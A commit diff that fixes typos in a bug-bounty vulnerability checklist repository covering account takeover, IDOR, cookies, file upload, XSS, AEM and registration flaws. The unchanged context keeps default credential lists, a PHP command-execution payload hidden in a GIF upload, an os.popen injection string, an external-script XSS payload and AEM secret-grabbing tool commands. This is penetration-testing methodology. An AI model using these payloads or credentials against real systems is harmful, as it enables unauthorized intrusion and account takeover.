Fix typos

Acount takeover/ATO.md

@@ -52,7 +52,7 @@ Occasionally, the application displays unnecessary data, such as valid OTPs, has
 [ ] **password reset**
 ```
 1. check if you are able to brute force the password reset OTP
-2. test for token predectability
+2. test for token predictability
 3. test for JWT misconfigurations
 4. check if the password reset endpoint is vulnerable to IDOR
 5. check if the password reset endpoint is vulnerable to Host Header injection
@@ -99,7 +99,7 @@ if the application does not use auth token or you can't access the cookies becau
 
 [ ] **IDOR to Account Takerover**
 ```
-1. checck if the email update endpoint is vulnerable to IDOR
+1. check if the email update endpoint is vulnerable to IDOR
 2. check if the password change endpoint is vulnerable to IDOR
 3. check if the password reset endpoint vulnerable to IDOR
 ```
@@ -144,7 +144,7 @@ when send rest account request intercept POST Request and Change Host header val
 
 [ ] **CORS Misconfiguration to Account Takeover**
 
-If the page contains CORS missconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose:
+If the page contains CORS misconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose:
 ```
 https://book.hacktricks.xyz/pentesting-web/cors-bypass
 ```

Admin panal/adminpanal.md

@@ -1,18 +1,18 @@
-[ ] defualt credentials
-[defualt credentials](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#default-credentials)
+[ ] default credentials
+[default credentials](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#default-credentials)
 ```
 admin:admin
 admin:password
 author:author
 administrator:password
 admin123:password
 username:pass12345
-and many of defualt credentials
+and many of default credentials
 ```
 
 [ ] Bypass by SQL Injection
 ```
-inject username or paswword with a lot of payloads:
+inject username or password with a lot of payloads:
 => error based
 => time  based
 ```

Aem misconfiguration/aem.md

@@ -2,15 +2,15 @@
 https://www.youtube.com/watch?v=EQNBQCQMouk
 ##### method
 - collect sub domain 
-- use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem 
+- use nuclei/nuclei-templates/technologies/tech-detect.yaml to identify aem 
 - Python3 ./aem_hacker.py –u https://example — host localhost
 - use https://github.com/clarkvoss/AEM-List/blob/main/paths to fuzz on path
 
 ##### aem tools
 - https://github.com/0ang3el/aem-hacker
 - https://github.com/0ang3el/aem-rce-bundle
 ```
-python3 aem_hacker.py    -u     --host yourvpshostname         =>comman usage
+python3 aem_hacker.py    -u     --host yourvpshostname         =>common usage
 python3 aem_discovery.py --file urls.txt --workers 150         =>discover url
 python3 aem_enum.py      --url                                 => automate usernames and secrets grabbing
 python3 aem_ssrf2rce.py  --url  --fakaem yourvbs
@@ -102,7 +102,7 @@ jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%
 ```
 everything is stored in jcr repository :
 - secrets (password  ,encryption key , tokens)
-- cinfiguration
+- configuration
 - pII
 - usernames
 
@@ -136,7 +136,7 @@ everything is stored in jcr repository :
     - /.ext.json
     - /.childrenlist.json
  - or guess node names :   
-    - comman names /content, /home, /var, /etc
+    - common names /content, /home, /var, /etc
  - Dump props for each child node of jcr:root :
     - /etc.json or /etc.s.json or /etc.-1.json 
 

Api Authentication /Authentication.md → Api Authentication/Authentication.md

@@ -768,4 +768,4 @@ username[0]=admin
 username=admin&username=admin
 delete username=admin
 
-```
+```

Bussiness Logic/bussiness logic.md

@@ -1,6 +1,6 @@
 1. change the price with other price :100->50
-2. change the price with nagative price :100->-100
-3. change the price with other price by add nagative value: 100 ->(+-120)
+2. change the price with negative price :100->-100
+3. change the price with other price by add negative value: 100 ->(+-120)
 4. change the price with other price by mult by 0.5: 100->(0.5*100)
 5. Retrieving a Profile
 ```
@@ -198,5 +198,5 @@ from URLs or by using some internal  parameters.
 • Once a target parameter has been identified start doing basic brute force or guess work to fetch another user’s files  from server.
 ```
 
-26. null pyloads
+26. null payloads
 27. in change password try to delete current password

CSRF/csrf.md

@@ -88,7 +88,7 @@ email=....&csrftoken=.....
 - steps                                                                                                                                                                     
 1- create two accounts                                                                                                                                                                     
 2- go to the first account and change email we will change                                                                                                                                                                     
-3- go to second account and try intersept change email then drop request , copy the csrf token                                                                                                                                                                     
+3- go to second account and try intercept change email then drop request , copy the csrf token                                                                                                                                                                     
 4- go to the first account and put csrf token(second account) and try change email is valid or not
 
 

Cookie Attack/cookie.md

@@ -1,6 +1,6 @@
-[ ] sensetive Data Stored in Cookies
+[ ] sensitive Data Stored in Cookies
 ```
-check if anf pii or other sensitive infromation stored in  cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc.
+check if anf pii or other sensitive information stored in cookies this information usually includes : email, sessionID, data of birth, mobile address, ssn, etc.
 ```
 
 [ ] cookie length violation 
@@ -24,12 +24,12 @@ some times it can be used to escalate privilege or if the application malfunctio
 
 [ ] Mass Assignment
 ```
-similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id  parameter
+similar to the parameter pollution, however in this , attacker tried to inject multiple user ID in same user_id  parameter
 ```
 
 [ ] Damial of service - cookie Bomb
 ```
-forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attack 
+forcing the server to process cookies larger than the restricted cookie size defined by the server may cause danial of service attack 
 
 https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx
 
@@ -64,7 +64,7 @@ sqlmap -u "" --cookie="" -p "" --dbs
 - the application is not retrieve data it is not vulnerability
 ```
 
-[ ] Authentication Bybass (cookie are not avalid)
+[ ] Authentication Bybass (cookie are not valid)
 ```
 try accessing a protected resource by removing cookies
 ```
@@ -77,17 +77,17 @@ change the "name" value to "xss payload"
 
 [ ] Insufficient session management
 ```
-1. session doesnt expire on logout 
-2. long session expirey
-3. session doesnt expire on password reset /change
+1. session doesn't expire on logout 
+2. long session expired
+3. session doesn't expire on password reset /change
 4. concurrent session
 ```
 
 [ ] privilege escalation
 - horizontal
 ```
 1.assume that the application uses mult-organization models
-2.cookie are used wich organized user can access
+2.cookie are used which organized user can access
 3.alter the cookie in order to access some other application
 ```
 - vertical
@@ -98,12 +98,12 @@ change the "name" value to "xss payload"
 - similarly
 ```
 1.try if the flower users cookies can be used to access higher users function 
-2.try if the cookie of organization 1 user van be used to access function of organizaion 2
+2.try if the cookie of organization 1 user van be used to access function of organization 2
 ```
 
-[ ] sesion puzzing
+[ ] session puzzling
 ```
-when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user
+when an application utilizes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user
 ```
 
 
@@ -157,7 +157,7 @@ str("-"*50),__import__('os').popen('COMMAND').read()
 ```
 [ ] Insecure Deserialization
 ```
- if cookis are using serialized Objects ,try performing insecure Deserialization Checks.
+ if cookies are using serialized Objects ,try performing insecure Deserialization Checks.
  portswigger laps
 ```
 [ ] Electronic Code Book                                                                                                                                   

File Upload/File Upload.md

@@ -2,7 +2,7 @@
 In upload file feature, for example upload photo profile feature
 
 ## How to exploit
-read also this pdf it conayin a many of ideas                                                                                                               
+read also this pdf it contain a many of ideas                                                                                                               
 1-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/File-Upload.pdf                                    by`0xAwali`                   
 2-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/Slides(1).pdf                                      by`ebrahim hegazy`       
 
@@ -60,7 +60,7 @@ Content-Type: image/gif
 
 GIF89a; <?php system("id") ?>
 ```
-And dont forget to change the content-type to image/gif
+And don't forget to change the content-type to image/gif
 
 4. Bypass content length validation, it can be bypassed using small payload
 ```

IDOR Vulnerability/idor.md

@@ -7,13 +7,13 @@ Base Steps:
 ```
 
 [ ]
-[ ] image profilie
-[ ] delete acount 
-[ ] infromation acount
+[ ] image profile
+[ ] delete account 
+[ ] information account
 [ ] VIEW & DELETE & Create api_key
 [ ] allows to read any comment
 [ ] change price
-[ ] chnage the coin from dollar to uaro
+[ ] change the coin from dollar to uaro
 [ ] Try decode the ID, if the ID encoded using md5,base64,etc
 ```html
 GET /GetUser/dmljdGltQG1haWwuY29t
@@ -74,7 +74,7 @@ GET /api/users/*
 
 [ ] Never ignore encoded/hashed ID
 ```bash
-for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD
+for hashed ID ,create multiple accounts and understand the pattern application users to allot an iD
 ```
 
 [ ] Google Dorking/public form
@@ -87,7 +87,7 @@ search all the endpoints having ID which the search engine may have already inde
 use tools like arjun , paramminer 
 ```
 
-[ ] Bypass object level authorization Add parameter onto the endpoit if not present by defualt
+[ ] Bypass object level authorization Add parameter onto the endpoint if not present by default
 ```bash
 GET /api_v1/messages ->200
 GET /api_v1/messages?user_id=victim_uuid ->200
@@ -125,7 +125,7 @@ GET /user_data/2341.txt    -> 200
 {"userid":{"userid":123}} ->200
 ```
 
-[ ] Test an outdata API version 
+[ ] Test an outdated API version 
 ```bash
 GET /v3/users_data/1234 ->401
 GET /v1/users_data/1234 ->200

RXSS/xss.md

@@ -42,7 +42,7 @@ https://github.com/yavolo/eventlistener-xss-recon
 
 - use your payloads :`` <script/src=//NJ.₨></script> 
 
-- your report if not acceptd 
+- your report if not accepted 
 
 -  cat host.txt | crawler | tee -a endpoint.txt   & cat host.txt | waybackurl | tee -a endpoint.txt 
 
@@ -71,7 +71,7 @@ XSS.yaml : gist.githubusercontent.com/raoufmaklouf/7… 
 
 ### third method
 ```
-irst of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and 
+First of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and 
 then subdomain brute-forcing with [knockpy](https://github.com/guelfoweb/knock), 
 then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS and then I used [gf](https://github.com/tomnomnom/gf) to get possible XSS parameters. 
 after sorting the URLs I used [KXSS](https://github.com/Emoe/kxss) 

exif Vulnerability/exif_geo.md

@@ -4,12 +4,12 @@ When a user uploads an image in example.com, the uploaded image’s EXIF Geoloca
 <h4>Steps to reproduce:</h4>
 
 1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg) <br>
-2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s . <br>
+2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also with different MB’s . <br>
 3. Go to Upload option on the website <br>
 4. Upload the image<br>
-5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect ,   edit it as html )</br>
+5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect, edit it as html )</br>
 6. open it (http://exif.regex.info/exif.cgi)</br>
-7. See wheather is that still showing exif data , if it is then Report it.
+7. See weather is that still showing exif data, if it is then Report it.
 
 # Reports (Hackerone)
 

register vulnerability/register.md

@@ -4,8 +4,8 @@
 1. create first account in application with email say [email protected] and password
 2. logout of the account and create another account with same email and different password
 3. you can even try to change email case like from abc2gmail.com to [email protected]
-4. finish the creation proccess and see that it succceed
-5. now go back and try to login with email and the new password ,you are seccess logged in
+4. finish the creation process and see that it succeed
+5. now go back and try to login with email and the new password, you are success logged in
 ```
 [ ] Dos at name /password field in sign up page
 ```
@@ -16,8 +16,8 @@
 
 [ ] no rate limit at signup page
 ```
-1. enter your details in signuo form and submit the form
-2. capture the signuo request and send it to intruder
+1. enter your details in signup form and submit the form
+2. capture the signup request and send it to intruder
 3. add $$ to email parameter
 4. in the payload add different email address
 5. fire up intruder and check whether it return 200 ok
@@ -33,25 +33,25 @@ xss can be test in any of parameter
 
 [ ] email varification can be easily bypassed with following method
 ```
-1. response manipulation change the bad respone with good one like false to true
+1. response manipulation change the bad response with good one like false to true
 2. status code manipulation change the 403 to 200
 ```
 
-[ ] weak register implemntation
+[ ] weak register implementation
 ```
 1. check whether the allows disposable email addresses
 2. register form on non-https page
 ```
 
 [ ] weak password policy
 ```
-1. check whether application allows easily guessable passsword like 123456
+1. check whether application allows easily guessable password like 123456
 2. check if you can use username same as the email address
 3. check if can use password same as that email address
 4. improperly implemented password recovery link functionality
 ```
 
 [ ] Path Overwrite
 ```
-If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting takeovered.
+If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will come up and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting take overed.
 ```

tips from twitter /tips_twitter.md → tips from twitter/tips_twitter.md

@@ -35,7 +35,7 @@ Would be interested to know if this is target specific or other CloudFront websi
 ```
 1 : Get all the URL from wayback / Gau 
 2 : Filter out the js file using httpx 
-3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension
+3 : Check Manually all the js file or you can use nuclei template or used @trufflesec chrome extension
 ```
 [ ] Tip 5
 ```
@@ -237,9 +237,9 @@ URL that causes the cookie length to exceed request header limits for all reques
 [ ] Tip 25
 xss via jwt
 ```
-1. Make a jwt token and insert a xss paylaod.
+1. Make a jwt token and insert a xss payload.
 2. The final url is like url/dest?jwt=vulnerable-jwt-token. 
-(jwt= paramter was decoding the provided jwt token and show's it into the page).
+(jwt= parameter was decoding the provided jwt token and show's it into the page).
 ```
 
 [ ] Tip 26
@@ -267,7 +267,7 @@ https://twitter.com/Pwn2arn/status/1609146484263641089
 [ ] Tip 27
 Easy P1 upside_down_face
 ```
-1: Collect all the Js files by using the developer tool on mozila
+1: Collect all the Js files by using the developer tool on mozilla
 2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool 
 3: Now check manually sensitive keyword js file
 ```
@@ -277,7 +277,7 @@ Tips for my last P1 :
 ```
 1 - Found dev portal for developing require Basic Auth 
 2 - search in GitHub "domain" docker
-3- found a user try to pull the privite repository and passing the username:pass 
+3- found a user try to pull the private repository and passing the username:pass 
 4 - Decode Base64 Basic Auth 
 5 - Logged in and full access on all Prod
 
@@ -293,7 +293,7 @@ Github leak for Aws,jira,okta etc
 ```
 
 [ ] Tip 30
-soucremap js 
+sourcemap js 
 ```
 https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
 https://github.com/rarecoil/unwebpack-sourcemap
@@ -322,4 +322,3 @@ www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so
 insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook.
 
 ```
-